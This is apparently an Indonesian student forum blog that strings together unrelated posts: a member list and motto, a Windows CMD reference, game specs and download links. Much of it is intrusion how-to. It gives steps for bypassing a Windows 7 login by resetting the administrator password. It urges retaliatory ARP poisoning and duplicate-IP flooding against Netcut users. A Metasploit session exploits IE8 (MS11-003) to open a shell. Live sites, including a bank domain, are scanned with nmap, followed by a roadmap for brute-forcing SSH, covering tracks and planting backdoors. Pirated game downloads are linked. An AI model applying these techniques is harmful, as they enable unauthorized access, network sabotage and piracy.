*Rangga (BSI)
*Ableh (Usni)
*Robby (Usni)
*Kibo (Usni)
*Bobby (IPB)
*Anas (Karyawan)
*Saipul (Uhamka)
*Adi (Usni)
*Rosma (Usni)
*Bella (Usni)
*Nurul (Usni)
*Joe (Gunadarma)
*Khaidar (UI)
*Ricky (UP)
kami sengaja membentuk Forum/Organisasi ini untuk membangun ke solidaritasan antar teknik semua jurusan, tidak membeda-bedakan sesama,menjalin kekompakkan, membentuk kepemimpinan, membangun logika otak masing-masing dan menghasilkan sebuah karya yang bisa bermanfaat bagi semua. Didalamnya terdapat orang-orang yang memiliki jiwa teknik dan siap mengarahkan teman-teman menggapai tujuan yang sudah dituju.
ARTI LAMBANG G : Global = mencakup secara global bagi semua orang ataupun berbeda jurusan namun memiiki jiwa teknik
Petir : Identik dengan Teknik = harus memiliki sikap yang tanggap, cepat dalam merespon, dan cepat dalam bertindak
Percikan = bahwa karya-karya yang dibuat oleh anggota G-Sonic dapat bermanfaat bagi masyarakat luas.
Visi : Gunakanlah Otakmu dan janganlah menggunakan software atau aplikasi selagi masih bisa menggunakan otak dan logika atau jadikanlah dirimu dewasa dan pertahankan arti persahabatan.
Misi : Membangun Jiwa kepemimpinan, menciptakan ide-ide yg brilian, membuat logika dan otak yg berbicara, menghasilkan sebuah karya, membantu lulusan gsonic untuk belajar usaha dan mempunyai pikiran untuk ke depannya nanti.
Semboyan : Keep FriendShip 'N' Brotherhood Forever berbeda tetapi satu, We are not Friend But We Are Family, We are not Hacker, Defacer, Attacker, Cheater and Cracker But We Technical
≈We Life Together
≈We Fight Together
≈We Die Together
≈We Walk Together
Satu Tujuan Kita semua Tanpa ada rasa menyerah, Mari kita berkarya untuk kalian semua Bersama Teknik Kemarin, Hari ini Dan untuk selama-lamanya
*KITA DISINI MENJUNJUNG NAMA TEKNIK*
*KITA DISINI MENJUNJUNG PERSAUDARAAN*
*KITA DISINI SEMUA ADALAH SATU*
Keep N Touch Ur Heart For Teknik Brotherhood
Membobol WIndows 7 Yang Di Password
Caranya sebagai berikut :
- Restart komputernya, sebelum logo windows muncul, cepat sobat tekan tombol F8. Disini sobat masuk ke jendela safe modenya windows.
- Di sini adaa beberapa pilihan yang tersedia, sobat pilih saja repair your computer, nanti akan muncul jendela repair komputer.
- Setelah sudah tampil interface dari Jendela Repair Your Computer, klik Open Command Prompt, Lalu sobat ketikan perintah berikut pada jendela comand promt tadi ketikan ” net user administrator /active:yes” ** tanpa tanda petik.
- Setelah ada pesan the command active successfull, ketikan perintah ini ”net user administrator password ” **ganti kata password sesuai keinginan sobat, misalnya "net user administrator saya"
- Di sini sobat sudah berhasil mengganti pasword komputer tadi dengan pasword "saya". Tutup jendela command promptnya, klik restart komputer
- Setelah komputer meminta memasukan pasword administratornya sobat masukan deh tuh pasword yang tadi..
Call Of Duty Modern Warfare 3
RAM: 2GB RAM
VGA: Shader 3.0 or better 256 MB NVIDIA®GeForce™ 8600GT / ATI® Radeon™ X1950 or better
DX: DirectX® 9.0C or later
OS: Windows® XP / Windows Vista® / Windows® 7
http://gamesystemrequirements.com/
HDD: 16 GB free hard drive space
Sonic The Hedgehog 4 Episode 1
Sonic The Hedgehog 4 Episode 1
Perintah-Perintah CMD
perintah-perintah Command Prompt, atau sering kita sebut CMD. Command Prompt adalah sebuah perintah dos yang terdapat pada OS windows yang dapat memudahkan user dalam menjelajahi windows baik secara online maupun offline, dan aplikasi ini bisa juga disalahgunakan oleh seorang cracker untuk menjalankan aksi-aksinya hanya dengan menggunakan command prompt. Maka dari itu sebagai langkah antisipasi bagi anda sebagai user adalah dengan mengenal lebih jauh tentang seluk beluk dari command prompt agar bisa memahami cara kerja dan manfaatnya, salah satu dari sekian banyak manfaat dari command prompt adalah kemampuannya untuk mendeteksi adanya virus, memisahkan virus dengan file yang diinfeksinya, mencari file induk virus hanya dengan perintah ATTRIB. Berikut dibawah ini merupakan daftar perintah-perintah yang ada pada command prompt dari A-X :
a
ARP : Address Resolution Protocol
Assoc : Ubah ekstensi file asosiasi
ASSOCIAT : Salah satu langkah asosiasi file
Attrib : Ubah atribut berkas
b
Bootcfg : Edit Windows boot settings
BROWSTAT : Dapatkan domain, info browser dan PDC
c
CACLS : Ubah file permissions
CALL : Panggil satu program batch yang lain
CD : Mengganti Directory – pindah ke Folder tertentu
Change : Ganti Terminal Server Session properties
CHKDSK : Check Disk – memeriksa dan memperbaiki masalah disk
CHKNTFS : Periksa sistem file NTFS
CHOICE : Menerima input keyboard ke sebuah file batch
CIPHER : Encrypt atau Decrypt file / folder
CleanMgr : Ototmatis membersihkan Temperatur file, recycle bin
CLEARMEM : Hapus kebocoran memori
CLIP : Salin STDIN ke Windows clipboard.
CLS : Menghapus layar (Clear The Screen)
CLUSTER : Windows Clustering
CMD : Start a new CMD shell
COLOR : Mengubah warna dari jendela CMD
COMP : Membandingkan isi dari dua file atau set file
COMPACT : Compress file atau folder pada partisi NTFS
Compress : Compress tunggal file pada partisi NTFS
CON2PRT : Menghubungkan atau memutuskan sambungan dengan Printer
CONVERT : Konversi FAT ke drive NTFS
COPY : Menyalin satu atau lebih file ke lokasi lain
CSCcmd : clien-side caching (Offline Files)
CSVDE : Impor atau Ekspor Active Directory data
d
DATE : Display atau mengatur tanggal
Defrag : Defragment hard drive
DEL : Menghapus satu atau lebih file
DELPROF : Hapus profil pengguna NT
DELTREE : Menghapus folder dan semua subfolder
DevCon : Device Manager Command Line Utility
DIR : Menampilkan daftar file dan folder
DIRUSE : Tampilkan penggunaan disk
DISKCOMP : Bandingkan isi dua floppy disk
Diskcopy : Salin isi dari satu disket ke yang lain
DISKPART : Disk Administrasi
DNSSTAT : DNS Statistik
DOSKEY : Edit baris perintah, ingat perintah, dan membuat macro
DSADD : Tambah User (komputer, group ..) ke direktori aktif
DSQUERY : Daftar item dalam direktori aktif
DSMOD : Ubah user (computer, group ..) di direktori aktif
DSRM : Hapus item dari Active Directory
e
ECHO : Menampilkan pesan di layar
ENDLOCAL : Akhir localisation perubahan lingkungan dalam file batch
ERASE : Menghapus satu atau lebih file
EVENTCREATE : Tambahkan pesan ke Windows event log
EXIT : Keluar dari skrip arus / rutin dan menetapkan errorlevel
EXPAND : uncompress file
Ekstrak : uncompress file CAB
f
FC : Bandingkan dua file
FIND : Mencari string teks dalam sebuah file
FINDSTR : Cari string dalam file
FOR / F : pengulangan perintah terhadap satu set file
FOR / F : pengulangan perintah terhadap hasil perintah lain
FOR : pengulangan perintah terhadap semua options Files, Directory, List
FORFILES : Proses Batch beberapa file
FORMAT : Format disk
FREEDISK : Periksa free disk space/disk yang tersisa (dalam bytes)
FSUTIL : File dan Volume utilitas
FTP : File Transfer Protocol
FTYPE : Tampilkan atau memodifikasi jenis file yang digunakan dalam asosiasi ekstensi file
g
GLOBAL : Display keanggotaan kelompok global
GOTO : Direct a batch program untuk melompat ke baris berlabel
GPUPDATE : Update pengaturan Kebijakan Grup
h
HELP : Online Help
i
ICACLS : Ubah file dan folder permissions
IF : kondisional melakukan perintah
IFMEMBER : Apakah pengguna saat ini dalam sebuah NT Workgroup
IPCONFIG : Configure IP
k
KILL : Remove program dari memori
l
LABEL : Edit disk label
LOCAL : Display keanggotaan kelompok-kelompok lokal
LOGEVENT : Menulis teks ke NT event viewer
Logoff : user log off
LOGTIME : log tanggal dan waktu dalam file
m
MAPISEND : Kirim email dari baris perintah
MBSAcli : Baseline Security Analyzer
MEM : Display penggunaan memori
MD : Buat folder baru
MKLINK : Buat link simbolik (linkd)
MODE : Mengkonfigurasi perangkat sistem
MORE : Display output, satu layar pada satu waktu
MOUNTVOL : mengelola volume mount point
MOVE : Pindahkan file dari satu folder ke yang lain
MOVEUSER : Pindahkan pengguna dari satu domain ke domain lainnya
MSG : mengirim pesan atau message
MSIEXEC : Microsoft Windows Installer
MSINFO : Windows NT diagnostics
MSTSC : Terminal Server Connection (Remote Desktop Protocol)
MUNGE : Cari dan Ganti teks dalam file (s)
MV : Copy in-menggunakan file
n
NET : Kelola sumber daya jaringan
NETDOM : Domain Manager
Netsh : Configure Network Interfaces, Windows Firewall & Remote akses
NETSVC : Command-line Service Controller
NBTSTAT : Tampilkan statistik jaringan (NetBIOS over TCP / IP)
NETSTAT : Display networking statistics (TCP / IP)
NOW : Tampilan saat ini Tanggal dan Waktu
NSLOOKUP : Nama server lookup
NTBACKUP : Backup folder ke tape
NTRIGHTS : Edit hak user account
p
PATH : Menampilkan atau menetapkan path pencarian untuk file executable
PATHPING : jejak jalur jaringan ditambah paket latensi dan kerugian
PAUSE : memenjarakan(suspend) pengolahan file batch dan menampilkan pesan
perms : Tampilkan izin untuk pengguna
PERFMON : Kinerja Monitor
PING : Menguji koneksi jaringan
POPD : Mengembalikan nilai sebelumnya dari direktori sekarang yang disimpan oleh PUSHD
PORTQRY : Tampilan status ports dan services
Powercfg : Mengkonfigurasi pengaturan daya
PRINT : Mencetak file teks
PRNCNFG : Display, mengkonfigurasi atau mengubah nama printer
PRNMNGR : Tambah, menghapus, daftar printer menetapkan printer default
PROMPT : Mengubah command prompt
PsExec : Proses Execute jarak jauh
PsFile : menampilkan file dibuka dari jarak jauh (remote)
PsGetSid : Menampilkan SID sebuah komputer atau pengguna
PsInfo : Daftar informasi tentang sistem
PsKill : proses mematikan berdasarkan nama atau ID proses
PsList : Daftar informasi rinci tentang proses-proses
PsLoggedOn : siapa saja yang log on (lokal atau melalui resource sharing)
PsLogList : catatan kejadian log
PsPasswd : Ubah sandi account
PsService : Melihat dan mengatur layanan
PsShutdown : Shutdown atau reboot komputer
PsSuspend : proses Suspend
PUSHD : Simpan dan kemudian mengubah direktori sekarang
q
QGREP : Cari file(s) untuk baris yang cocok dengan pola tertentu
r
RASDIAL : Mengelola koneksi RAS
RASPHONE : Mengelola koneksi RAS
Recover : perbaikan file yang rusak dari disk yang rusak
REG : Registry = Read, Set, Export, Hapus kunci dan nilai-nilai
REGEDIT : Impor atau ekspor pengaturan registry
Regsvr32 : Register atau unregister sebuah DLL
REGINI : Ubah Registry Permissions
REM : Record comments (komentar) di sebuah file batch
REN : Mengubah nama file atau file
REPLACE : Ganti atau memperbarui satu file dengan yang lain
RD : Hapus folder (s)
RMTSHARE : Share folder atau printer
Robocopy : Copy File dan Folder secara sempurna
RUTE : Memanipulasi tabel routing jaringan
RUNAS : Jalankan program di bawah account pengguna yang berbeda
RUNDLL32 : Jalankan perintah DLL (add / remove print connections)
s
SC : Control Layanan
SCHTASKS : Jadwal perintah untuk dijalankan pada waktu tertentu
SCLIST : Tampilkan Layanan NT
SET : Display, set, atau menghapus variabel environment
SETLOCAL : Pengendalian environment visibilitas variabel
SETX : Set variabel environment secara permanen
SFC : Pemeriksa Berkas Sistem
SHARE : Daftar atau mengedit file share atau share print
SHIFT : Shift posisi digantikan parameter dalam sebuah file batch
SHORTCUT : jendela Buat shortcut (. LNK file)
SHOWGRPS : Daftar NT Workgroups seorang pengguna telah bergabung
SHOWMBRS : Daftar Pengguna yang menjadi anggota dari sebuah Workgroup
SHUTDOWN : Shutdown komputer
SLEEP : Tunggu untuk x detik
SLMGR : Software Licensing Management (Vista/2008)
SOON : Jadwal perintah untuk menjalankan dalam waktu dekat
SORT : Sort input
START : memulai sebuah program atau perintah dalam jendela terpisah
SU : Switch User
SUBINACL : Edit file dan folder Permissions, Kepemilikan dan Domain
SUBST : Associate jalan dengan huruf drive
Systeminfo : Daftar konfigurasi sistem
t
TASKLIST : Daftar menjalankan aplikasi dan services
TASKKILL : Hapus proses yang berjalan dari memori
TIME : Menampilkan atau mengatur waktu sistem
TIMEOUT : penundaan pemrosesan dari sebuah batch file
TITLE : Mengatur judul window untuk sesi cmd.exe
TLIST : daftar tugas dengan path lengkap
TOUCH : mengganti file timestamps
Tracert : Trace route ke sebuah remote host
TREE : tampilan grafis struktur folder
TYPE : Menampilkan isi dari file teks
u
USRSTAT : Daftar domain nama pengguna dan terakhir login
v
VER : Tampilkan versi informasi
VERIFY : Pastikan bahwa file sudah disimpan
VOL : Menampilkan sebuah label disk
w
WHERE : Menempatkan dan menampilkan file dalam sebuah pohon direktori
wHOAMI : Output UserName saat ini dan manajemen domain
WINDIFF : Bandingkan isi dua file atau set file
WINMSD : Sistem Windows diagnostik
WINMSDP : Sistem Windows diagnostik II
WMIC : Perintah WMI
x
XCACLS : Ubah file dan folder permissions
XCOPY : Menyalin file dan folder
SQL Ninja
Serangan balik buat pengguna Netcut
Anda masih sering menggunakan Net cut jika berada di area wifi ? Hentikan kebiasaan itu
karena tools Net cut kesayangan anda bisa menjadi bomerang buat komputer anda.
Hah masak sih ? serius kah ? Padahal kan udah pakai IP hidden
masak masih bisa ketangkep siapa penggunanya ?
Mau tau kenapa tetap masih bisa ketahuan ? lanjutkan aja baca artikel ini.
Konsep kerja Net cut
Pertama-tama mari kita lihat cara kerja netcut, bagaimana sebetulnya tool ini bisa memotong koneksi jaringan kita.
Dalam situasi normal, beginilah cara kerja komputer kita sewaktu mengirim data ke router.
Ada 2 hal yang diperlukan komputer kita untuk berkomunikasi yaitu IP address dan MAC address. Dalam situasi normal, apabila kita sedang berinternet, paket data yang kita kirimkan akan berisi IP address router dan MAC address router.
Apa yang dilakukan netcat untuk mengganggu komunikasi kita / melakukan cut koneksi kita ? Pada contoh di bawah ini komputer C adalah komputer pengguna netcat, netcat akan mengirimkan informasi palsu yang menyatakan bahwa IP address router (192.168.0.2) adalah dirinya (MAC address CC.CC.CC.CC.CC.CC). Serangan tipe ini disebut ARP poisoning (ARP = Address Resolution Protocol – protokol untuk mencari MAC address, ARP poisoning = meracuni proses ARP). Serangan tipe ini sederhana tetapi efektif karena komputer pada dasarnya adalah benda yang lugu (lucu-lucu guoblok !), jadi tanpa curiga komputer kita akan percaya begitu saja tanpa melakukan cek dan recek. Akibatnya adalah, tanpa merasa bersalah komputer kita akan mengubah MAC address router menjadi MAC address si komputer pengguna netcut (Komputer C), akibatnya kita tidak bisa browsing ke internet lagi dan si pengguna netcut ketawa-ketiwi geli.
Udah tau kan cara kerja dari Net cut ? sekarang saatnya menyerang balik nih buat si penggunanya
gunakan tools sniffer (wireshark adalah favorit saya), perhatikan traffic yang masuk, lakukan filter ARP, maka anda akan melihat ada paket-paket ARP gadungan yang masuk. Apa kriteria paket ARP gadungan ? Nah kita lihat dulu sebentar cara kerja ARP, belajar bentar yah biar gak bisa dibodohin penjahat.
Cara kerja ARP sederhana, pada saat komputer anda ingin mengirimkan paket data maka dia akan bertanya kepada IP address tujuan, “hoiii bro….MAC kamu berapa ?”, lalu pertanyaan ini akan dijawab kembali oleh si empunya IP address, “halo bro, MAC saya XX.XX.XX”. Sudah selesai deh, sederhana kan. Nah kembali pada pertanyaan awal, bagaimana kita bisa membedakan paket ARP gadungan ? Saya yakin beberapa orang yang kritis pasti sudah dapat jawabannya. Perhatikan prosesnya, proses yang benar adalah kita bertanya, lalu dijawab…. ARP poisoning bekerja dengan cara, tidak ada yang tanya, tapi ada jawabannya…. Jadi so komputer pengguna netcut (komputer C) akan terus-terusan mengirimkan paket jawaban ARP yang berisikan informasi palsu, oleh karena itu teknik ini disebut ARP poisoning.
Nah setelah kita menemukan paket-paket gadungan itu, tinggal di cek deh, datangnya dari komputer mana, nah sekarang kita tahu MAC address si penjahat. Selanjutnya yang perlu kita lakukan adalah melakukan query MAC address si penjahat (banyak website di google yang bisa), maka kita bisa tahu merek laptop yang digunakan apakah apple, toshiba, ibm, dll. Kalau kita sedang di area publik, kita bisa lihat-lihat sekeliling dan mulai menetapkan tersangka.
Best defense is a strong offense (pertahanan terbaik adalah serangan yang kuat), sekarang saatnya pembalasan. Karena kita sudah tahu MAC address si penjahat, maka kita bisa tahu IP addressnya sekarang. Pertanyaannya, bagaimana caranya kita melakukan cut koneksi dia ? Netcut mempunyai fitur proteksi, dimana komputer yang menjalankan netcut akan melakukan blokir terhadap paket-paket ARP sehingga tidak bisa diserang balik oleh ARP poisoning.Tenang aja ada banyak jurus yang bisa dipakai.
1. Lakukan ARP poisoning bukan ke komputer dia, tetapi langsung ke router. Kirim paket ARP palsu ke router dan katakan bahwa IP address si penjahat (komputer C = 192.168.0.3) adalah MAC address komputer anda, heheheh dia boleh proteksi komputer sendiri, tapi kalau tidak ada paket data yang bisa masuk ke komputernya karena sudah kita belokkan, mau apa ? Dengan cara ini, karena data dari router dialihkan ke komputer kita, maka kita bisa melihat apa yang sedang dikerjakan oleh komputer dia.
2. MAC address ada di layer 2, kalau layer 2 di proteksi, kita serang di layer 3, set IP address secondary anda menjadi IP yang sama dengan si penjahat, kirim ping nonstop dengan parameter -t ke router dengan IP address secondary anda. Maka network akan mendeteksi duplicate IP address terus menerus.
3. Apabila anda kebetulan adalah admin jaringan tersebut, hancurkan layer 1 nya…. lacak si penjahat terhubung melalui port mana, shut down port tersebut, beres toh….
4. Apabila ingin terlihat lebih ganas lagi anda bisa menggunakan teknik Remote Desktop.
masih belum juga percaya kalau pengguna Net cut bisa dilacak ? Callme aja kita wifi-an bareng-bareng
terus anda pakai tuh tools kesayangan Net cut, nanti aku praktekin langsung deh.
tapi resikonya tanggung sendiri ya
Your Uninstaller! 7.4 Full Version
Meng-uninstall software ataupun game melalui add or remove programs di Windows biasanya masih akan menyisahkan beberapa file dan registry sampah yang hanya memberatkan kinerja komputer atau notebook kita. Your Uninstaller PRO, software uninstaller yang sangat handal digunakan untuk menguninstal software. Your Uninstaller akan membersihkan folder, file dan registry-registry software yang di uninstal sampai bersih.
Gambar ... !!
Features yang tersedia
Remove programs that could not be removed by Add/Remove Program.
Advanced Uninstall mode to fix Microsoft Installer problems.
System wide scan for unused files and registry keys after normal uninstall.
Hunter mode uninstall, hunts the programs and kill / uninstall / delete them.
Groups installed applications with various groups.
Never uninstall “must have” applications. (options)
Shows all applications installed on your computer with different views.
Uninstalls screen savers.
Built-in Disk Cleaner helps you find and remove unnecessary files on your disk to save
Built-in Trace Eraser removes surfing traces so no one knows your hobby.
Built-in IE Context Menu Cleaner cleans the context menu of Internet Explorer.
Built-in take full control of Window startups.
Built-in helps you keep your Start Menu clean.
Backup and restore installed-applications.
Powerful “Type and Go” search feature allows you quickly find the program you are about to uninstall.
Detect invalid installations and remove them with one click.
Force removal of uninstall related entries in the registry (care to use!).
Quickload mode loads programs extremely fast.
Give detailed report about any installed applications.
Export programs list to file or printer.
Mencari shell windows 7 melalui jaringan
Disini saya akan memberikan contoh bagaimana cara hacking mendapatkan shell di windows 7 melalui jaringan dengan memanfaatkan browser Internet Explorer 8 yang mempunyai celah keamanan pada penanganan Cascading Style Sheets di memory (http://www.microsoft.com/technet/security/bulletin/ms11-003.mspx).Oke saya langsung saja.
Pertama kali download Metasploit Framework 3.71 atau yang lebih baru, setelah didownload maka anda jalankan metasploitnya, disini penulis menggunakan GUI. Setelah masuk di tampilan GUI maka klik Exploits -> Windows -> Browser -> ms11_003_ie_css_import, payload yang penulis pilih adalah shell lalu bind shell, lalu port di set 80, URIPATH penulis set /, saat exploitasi penulis tampilkan dalam bentuk Run in Console.
\ ,__,
\ (oo)____
(__) )\||–|| *
+ — –=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 59 days ago (2011.05.16)
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > exploit[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:80/
[*] Started bind handler
[*] Local IP: http://192.168.1.10:80/
[*] Server started.
[*] 192.168.1.10:1884 Received request for “/”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 192.168.1.10:1884 Received request for “/Gm8zVwl.html”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import HTML
[*] Started bind handler
[*] 192.168.1.10:1884 Received request for “/generic-1310601540.dll”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import .NET DLL[-] Exception handling request: An existing connection was forcibly closed by the remote host.
[*] 192.168.1.10:1889 Received request for “/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A”
[*] 192.168.1.10:1889 Sending windows/browser/ms11_003_ie_css_import CSS
[*] Sending stage (240 bytes) to 192.168.1.10
[*] Command shell session 2 opened (192.168.1.10:1890 -> 192.168.1.10:4444) at 2011-07-14 06:59:03 +0700
Untuk pengamanan anda dapat update IE anda atau upgrade ke IE 9. Penulis tidak bertanggung jawab segala hal yang diakibatkan tutorial ini.
Pahami cara kerja tools scaning port
adakah yang belum tahu mengenai apa itu port ? jika memang ada yang belum tahu, saya akan menjelaskan sedikit tentang apa itu port. Dalam protokol jaringan TCP/IP, sebuah port adalah mekanisme yang mengizinkan sebuah komputer untuk mendukung beberapa sesi koneksi dengan komputer lainnya dan program di dalam jaringan. Port dapat mengidentifikasikan aplikasi dan layanan yang menggunakan koneksi di dalam jaringan TCP/IP. Sehingga, port juga mengidentifikasikan sebuah proses tertentu di mana sebuah server dapat memberikan sebuah layanan kepada klien atau bagaimana sebuah klien dapat mengakses sebuah layanan yang ada dalam server. Port dapat dikenali dengan angka 16-bit (dua byte) yang disebut dengan Port Number dan diklasifikasikan dengan jenis protokol transport apa yang digunakan, ke dalam Port TCP dan Port UDP. Karena memiliki angka 16-bit, maka total maksimum jumlah port untuk setiap protokol transport yang digunakan adalah 65536 buah.
ok kita mulai saja ya bagaimana cara kerja sebuah tools pendeteksi port.
1. Cara kerja port scaning
Yang pertama adalah dengan menggunakan metode yang dinamakan TCP 3 Way Handshake. TCP koneksi akan dicoba dilakukan terhadap target dengan mengirimkan SYN paket, dan apabila Port dalam keadaan terbuka, maka target akan mengembalikan SYN/ACK paket.
Apabila paket RSET atau dalam waktu tertentu tidak diterima jawaban apa-apa, Timeout, maka dapat diambil kesimpulan target port dalam keadaan tertutup. Walaupun sebenarnya, hal ini dapat saja diakibatkan oleh firewall atau filtering lainnya di komputer target.
2. TCP syn scan
Dengan mengirimkan paket RSET sebelum koneksi TCP terjadi, server target tidak sempat mengambil log dari komunikasi waktu scan dilakukan. Apabila port dalam keadaan tertutup, kondisinya sama dengan pada saat TCP Connect Scan.
3. UDP Scan (ICMP Port Unreach)
Metode terakhir di sini adalah dengan menggunakan UDP paket. Port dianggap terbuka apabila tidak ada jawaban dari komputer target Dan, apabila port dalam keadaan tertutup, maka komputer target akan mengirimkan paket ICMP Port Unreachable, seperti terlihat pada gambar. Hanya saja, di beberapa network yang menggunakan firewall atau filtering lainnya, paket ini tidak diteruskan ke luar network.
B. LETS SCAN TARGET !!
disini saya akan menjelaskan port scaning dengan scaner nmap, what is nmap ?? oke buat yang belum tau nmap :
Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan.
meskipun ada yang GUI tapi yang akan saya jelaskan adalah scaning dengan commandline karena itu adalah basicnya..
oke akan saya contohkan 2 target yaitu :
www.hakzsite.us
www.ibank.klikbca.com
# nmap -v -sS -O www.hakzsite.us
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-13 00:01 SE Asia Standard Time
Initiating Ping Scan at 00:01
Scanning www.hakzsite.us (209.51.196.244) [4 ports]
Completed Ping Scan at 00:01, 0.75s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:01
Completed Parallel DNS resolution of 1 host. at 00:01, 0.33s elapsed
Initiating SYN Stealth Scan at 00:01
Scanning www.hakzsite.us (209.51.196.244) [1000 ports]
Discovered open port 80/tcp on 209.51.196.244
Discovered open port 25/tcp on 209.51.196.244
Discovered open port 443/tcp on 209.51.196.244
Increasing send delay for 209.51.196.244 from 0 to 5 due to 34 out of 111 droppe
d probes since last increase.
Completed SYN Stealth Scan at 00:02, 33.74s elapsed (1000 total ports)
Initiating OS detection (try #1) against www.hakzsite.us (209.51.196.244)
Retrying OS detection (try #2) against www.hakzsite.us (209.51.196.244)
Nmap scan report for www.hakzsite.us (209.51.196.244)
Host is up (0.31s latency).
rDNS record for 209.51.196.244: f4.c4.33.static.xlhost.com
Not shown: 996 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
443/tcp open https
1025/tcp filtered NFS-or-IIS
Device type: WAP|storage-misc|general purpose|firewall
Running (JUST GUESSING) : AVM embedded (94%), Netgear embedded (94%), Linksys em
bedded (94%), Western Digital Linux 2.6.X (89%), Linux 2.6.X (85%), ISS Linux 2.
4.X (85%)
Aggressive OS guesses: AVM FRITZ!Box FON WLAN 7050, Linksys WAG200G, or Netgear
DG834GT wireless broadband router (94%), Western Digital MyBook World Edition 2
NAS device (Linux 2.6.17.14) (89%), Linux 2.6.20-gentoo-r8 (Gentoo, x86, SMP) (8
5%), ISS Proventia GX3002C firewall (Linux 2.4.18) (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 31.393 days (since Wed Jan 12 14:36:20 2011)
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Read data files from: C:\Program Files\Nmap
OS detection performed. Please report any incorrect results at http://nmap.org/s
ubmit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.04 seconds
Raw packets sent: 1160 (56.064KB) | Rcvd: 1068 (43.268KB)
Terlihat ada 4 port yang terbuka
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
443/tcp open https
1025/tcp filtered NFS-or-IIS
# nmap -v -sS -O www.ibank.clikbca.com
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-13 00:07 SE Asia Standard Time
Failed to resolve given hostname/IP: www.ibank.klikbca.com. Note that you can’t
use ‘/mask’ AND ’1-4,7,100-’ style IP ranges
Read data files from: C:\Program Files\Nmap
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.46 seconds
Raw packets sent: 0 (0B) | Rcvd: 0 (0B)
ibank.klikbca.com merupakan situs yang palings serius pertahanannya. Bahkan oleh nmap yang melakukan stealth probe gagal untuk melihat port yang aktif di ibank.klikbca.com meskipun ada port yang aktif tapi telah ditutup oleh firewall demi keamanannya.
setelah kita mengetahui apa saja port yang terbuka barulah kita bisa melanjutkan ke tahap berikutnya sesuai port tersebut. ingat kita baru mencapai langkah ke 0 dimana kita berusaha mendapatkan informasi mengenai situs target.
misal port yang terbuka adalah
80/http = kita mulai mencari bug atau vulnerability melalui urlnya misal SQLI, LFI, RFI, dsb
22/ssh = kita bisa mencoba melakukan bruteforce login ssh bila sukses kita jadi ssh tinggal cari exploit localrootnya buat dapetin root access.
dsb.
langkah berikutnya adalah :
Step 1: Memperoleh akses ke situs.
Step 2: Menghack root.
Step 3: Menutupi bekas-bekas anda.
Step 4: Membuat backdoor untuk menjaga account.
Kita baru mencapai Step 0, usaha untuk membuka akses ke situs.
Sniper Elite (PC/ENG/Full)
Operating system: Windows XP/VISTA/7
CPU: Intel Pentium 4 3,2 GHz, Intel Pentium D 2.66 GHz, AMD Athlon 64 3500+
Memory: 1 GB RAM (XP), 2 GB RAM (VISTA/7)
Video Card: 256 MB graphics card, DirectX 10.0 or 9.0c, compatible, Shader Model 3.0 GeForce (6800/7600-7950/8600-8800/9600- 9800/GTX 260-280) or Radeon (X1650-1950/HD 2400-2900/3650-3870/4650-4870)
Hard Drive: 6,5 GB of free hard drive space
Sound card compatible with DirectX 9.0c
DVD-ROM, mouse, keyboard
- DOWNLOAD
- Link Mediafire | Password : http://www.topfreepcgame.com
- Folder Download
- ATAU !!
- Link Mediafire | password : Sniperelite-by-thamdee102@jokergameth.com
- Download Part 1 (100 mb)
- Download Part 2 (100 mb)
- Download Part 3 (100 mb)
- Download Part 4 (100 mb)
- Download Part 5 (100 mb)
- Download Part 6 (100 mb)
- Download Part 7 (100 mb)
- Download Part 8 (100 mb)
- Download Part 9 (100 mb)
- Download Part 10 (100 mb)
- Download Part 11 (100 mb)
- Download Part 12 (100 mb)
- Download Part 13 (100 mb)
- Download Part 14 (100 mb)
- Download Part 15 (100 mb)
- Download Part 16 (100 mb)
- Download Part 17 (100 mb)
- Download Part 18 (100 mb)
- Download Part 19 (100 mb)
- Download Part 20 (100 mb)
- Download Part 21 (100 mb)
- Download Part 22 (100 mb)
- Download Part 23 (2.83 mb)
- Installation:
- - Unrar
- - Unrar Again Sry (2 .RAR Files Cos I Compressed It More Soz)
- - Move Extracted Folder To Program Files
- - Right Click Sniper Elite.exe Or Something Like That, And Create Shortcut.
- - Move To Desktop.
- - Have Fun Playing
- Link Rapidshare
- Download Part 1 (104.86 mb)
- Download Part 2 (104.86 mb)
- Download Part 3 (104.86 mb)
- Download Part 4 (104.86 mb)
- Download Part 5 (104.86 mb)
- Download Part 6 (104.86 mb)
- Download Part 7 (104.86 mb)
- Download Part 8 (104.86 mb)
- Download Part 9 (104.86 mb)
- Download Part 10 (104.86 mb)
- Download Part 11 (104.86 mb)
